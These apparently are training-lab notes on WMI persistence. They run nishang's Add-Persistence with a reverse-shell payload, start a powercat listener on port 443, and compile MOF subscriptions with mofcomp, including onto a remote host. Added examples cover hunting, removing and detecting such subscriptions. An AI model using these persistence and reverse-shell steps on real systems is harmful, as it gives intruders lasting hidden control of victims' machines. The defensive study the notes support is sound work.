WMI Events

Extrinsic events:

https://github.com/KurtDeGreeff/PlayPowershell

PS C:\Users\victim6\Downloads\PlayPowershell-master\PlayPowershell-master> . .\Get-WMINamespace.ps1

PS C:\Users\victim6\Downloads\PlayPowershell-master\PlayPowershell-master> $namespaces = Get-WMINamespace

PS C:\Users\victim6\Downloads\PlayPowershell-master\PlayPowershell-master> foreach ($ns in $namespaces) { Get-WmiObject -Namespace $ns -List | Where-Object { $_.__SUPERCLASS -eq '__ExtrinsicEvent' } }

PS C:\Users\victim6\Downloads\PlayPowershell-master\PlayPowershell-master> Get-WmiObject -class win32_perfFormattedData_PerfOS_System
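The loop above depends on the external Get-WMINamespace.ps1 and only matches classes whose direct parent is __ExtrinsicEvent, so it misses nested subclasses such as Win32_ProcessStartTrace (which derives from Win32_ProcessTrace and Win32_SystemTrace before reaching __ExtrinsicEvent). The following is an added example, not code from the original page or from PlayPowershell: it walks the namespace tree with __NAMESPACE and matches on __DERIVATION, the list of all ancestors. The function names are chosen here.

```powershell
# Added example (not from the original page): enumerate every extrinsic event class
# in every WMI namespace without the external Get-WMINamespace.ps1.
function Get-WmiNamespaceRecursive {
    param([string]$Root = 'root')
    # Each __NAMESPACE instance is a child namespace of the one being queried;
    # namespaces the caller cannot read are skipped instead of aborting the walk.
    Get-WmiObject -Namespace $Root -Class __NAMESPACE -ErrorAction SilentlyContinue |
        ForEach-Object {
            $child = "$Root\$($_.Name)"
            $child
            Get-WmiNamespaceRecursive -Root $child
        }
}

function Get-ExtrinsicEventClass {
    foreach ($ns in (@('root') + (Get-WmiNamespaceRecursive))) {
        Get-WmiObject -Namespace $ns -List -ErrorAction SilentlyContinue |
            # __DERIVATION holds every ancestor class, so this also catches classes that
            # reach __ExtrinsicEvent through intermediate parents; the page's
            # __SUPERCLASS check only sees direct children.
            Where-Object { $_.__DERIVATION -contains '__ExtrinsicEvent' } |
            ForEach-Object {
                [pscustomobject]@{
                    Namespace  = $ns
                    Class      = $_.Name
                    Parent     = $_.__SUPERCLASS
                }
            }
    }
}

# Usage: list every extrinsic event class, grouped by namespace
Get-ExtrinsicEventClass | Sort-Object Namespace, Class | Format-Table -AutoSize
```

Extrinsic events are delivered by a provider as they happen (process start traces, registry change events); the permanent subscriptions used later on this page rely instead on the intrinsic __InstanceModificationEvent, which WMI synthesises by polling a class at the interval given by WITHIN.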

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master> cd .\Utility\

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> . .\Add-Persistence.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> help Add-Persistence -Examples

PS C:\Users\victim6\Downloads\new\new\tool\tool> cd .\nishang-master\

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master> cd .\nishang-master\

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master> cd .\Utility\

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> . .\Remove-Persistence.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> Remove-Persistence -remove

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> Add-Persistence -PayloadScript C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Shells\Invoke-PowerShellTcpOneLine.ps1 -Verbose

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> notepad.exe .\Remove-Persistence.ps1

Add-Persistence registers its __EventFilter (and the matching consumer) under the name WindowsSanity in root\subscription; confirm the filter exists:

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> gwmi __EventFilter -namespace root\subscription -filter "name='WindowsSanity'"

In another PowerShell session, start a listener for the reverse shell:

PS C:\Users\victim6\Downloads\new\new\tool\tool\powercat-master> cd .\powercat-master\

PS C:\Users\victim6\Downloads\new\new\tool\tool\powercat-master\powercat-master> . .\powercat.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\powercat-master\powercat-master> powercat -l -v -p 443 -t 1000

WMI Events – permanent event consumers:

Reboot-triggered filters poll this class and fire on its SystemUpTime property; inspect it:

PS C:\Users\victim6\Downloads\new\new\tool\tool\powercat-master\powercat-master> Get-WmiObject -class Win32_PerfFormattedData_PerfOS_System
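A permanent event subscription is three objects in root\subscription: an __EventFilter (the WQL trigger), an event consumer (CommandLineEventConsumer, ActiveScriptEventConsumer, etc., all deriving from __EventConsumer) and a __FilterToConsumerBinding that ties them together. The following is an added example, not code from the original page or from nishang: it lists every subscription on the host with filter and consumer joined through the binding, and removes one by name, which is what a defender does after spotting WindowsSanity in the gwmi output above. Function names are chosen here; both need an elevated prompt.

```powershell
# Added example (not from the original page or nishang): hunt and remove
# permanent WMI event subscriptions in root\subscription.
function Get-WmiPersistence {
    $ns = 'root\subscription'
    $filters   = Get-WmiObject -Namespace $ns -Class __EventFilter
    $consumers = Get-WmiObject -Namespace $ns -Class __EventConsumer   # every consumer type derives from this
    $bindings  = Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding

    foreach ($b in $bindings) {
        # Binding references are object paths such as  __EventFilter.Name="WindowsSanity";
        # pull the Name out of each so the lookup does not depend on the path prefix.
        $fName = [regex]::Match($b.Filter,   'Name="([^"]+)"').Groups[1].Value
        $cName = [regex]::Match($b.Consumer, 'Name="([^"]+)"').Groups[1].Value
        $f = $filters   | Where-Object { $_.Name -eq $fName }
        $c = $consumers | Where-Object { $_.Name -eq $cName }
        [pscustomobject]@{
            Filter       = $fName
            Query        = $f.Query
            ConsumerType = $c.__CLASS
            Consumer     = $cName
            # CommandLineEventConsumer carries a command line; ActiveScriptEventConsumer carries script text
            Payload      = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } else { $c.ScriptText }
        }
    }
}

function Remove-WmiPersistence {
    param([Parameter(Mandatory)][string]$Name)
    $ns = 'root\subscription'
    $pattern = 'Name="' + [regex]::Escape($Name) + '"'
    # Delete the binding first: once nothing references the filter and consumer they can be removed too.
    Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding |
        Where-Object { $_.Filter -match $pattern -or $_.Consumer -match $pattern } |
        Remove-WmiObject
    Get-WmiObject -Namespace $ns -Class __EventFilter   | Where-Object { $_.Name -eq $Name } | Remove-WmiObject
    Get-WmiObject -Namespace $ns -Class __EventConsumer | Where-Object { $_.Name -eq $Name } | Remove-WmiObject
}

# Usage: review everything first, then remove the nishang subscription by its known name
Get-WmiPersistence | Format-List
# Remove-WmiPersistence -Name 'WindowsSanity'
```

The Query column is the thing to read: a filter on __InstanceModificationEvent against Win32_PerfFormattedData_PerfOS_System with a SystemUpTime window is a reboot trigger, and a CommandLineTemplate that launches powershell.exe with an encoded or downloaded command is the payload Add-Persistence planted.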

MOF Files:

Compile a MOF into the local repository; with -autorecover the file is also added to the autorecover list so its objects are re-registered if the WMI repository is rebuilt; with -N: the objects are compiled into the given namespace, here root\subscription on a remote host:

mofcomp.exe c:\test\test.mof

mofcomp.exe -autorecover c:\test\test.mof

mofcomp.exe -N:\\192.168.222.144\root\subscription c:\test\test.mof

Now on cmd :

Open the cmd.exe

C:\Windows\system32>cd wbem

C:\Windows\System32\wbem>mofcomp.exe c:\users\victim6\Downloads\test.mof

This compiles the objects defined in test.mof into the repository. Open test.mof in Notepad to see what it defines.

Now try this

PS C:\Users\victim6\Downloads\new\new\tool\tool\powercat-master\powercat-master> gwmi __eventfilter -namespace root\subscription

The filter defined in test.mof now appears in the output, next to any others already registered (such as WindowsSanity from Add-Persistence).
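The page never shows what test.mof contains. The following is an added example, not the original page's file: it writes a MOF that registers the same three objects a permanent subscription needs, compiles it with mofcomp.exe as in the cmd steps above, and verifies the filter with the same gwmi query. The names TestFilter and TestConsumer, the path C:\test\test.mof and the echo payload are chosen here; run it elevated.

```powershell
# Added example (not from the original page): build, compile and verify a MOF
# that registers a permanent WMI event subscription.
$mofPath = 'C:\test\test.mof'

# The filter polls the counter class queried earlier on this page every 60 s
# (WITHIN 60) and fires once SystemUpTime is between 240 and 325 s, i.e. about
# four minutes after every boot. Single-quoted here-string: $Filter/$Consumer
# are MOF aliases, not PowerShell variables.
$mof = @'
#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $Filter
{
    Name = "TestFilter";
    EventNamespace = "root\\cimv2";
    QueryLanguage = "WQL";
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325";
};

instance of CommandLineEventConsumer as $Consumer
{
    Name = "TestConsumer";
    CommandLineTemplate = "cmd.exe /c echo fired > C:\\test\\fired.txt";
    RunInteractively = false;
};

instance of __FilterToConsumerBinding
{
    Filter = $Filter;
    Consumer = $Consumer;
};
'@

New-Item -ItemType Directory -Path (Split-Path $mofPath) -Force | Out-Null
Set-Content -Path $mofPath -Value $mof -Encoding ASCII

# Compile into the repository (elevated). Add -autorecover to survive a repository rebuild.
& "$env:SystemRoot\System32\wbem\mofcomp.exe" $mofPath

# Verify, as at the end of the page: the filter is now visible in root\subscription
Get-WmiObject -Namespace root\subscription -Class __EventFilter -Filter "Name='TestFilter'"

# Clean-up when finished: binding first, then filter and consumer
# Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding |
#     Where-Object { $_.Filter -match 'TestFilter' } | Remove-WmiObject
# Get-WmiObject -Namespace root\subscription -Class __EventFilter -Filter "Name='TestFilter'" | Remove-WmiObject
# Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer -Filter "Name='TestConsumer'" | Remove-WmiObject
```

The MOF route and nishang's Add-Persistence end up with identical objects in the repository; mofcomp.exe invocations and the resulting WMI activity (operational log Microsoft-Windows-WMI-Activity, and Sysmon event IDs 19, 20 and 21 for filter, consumer and binding creation) are the artefacts a defender looks for.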

@Saksham Dixit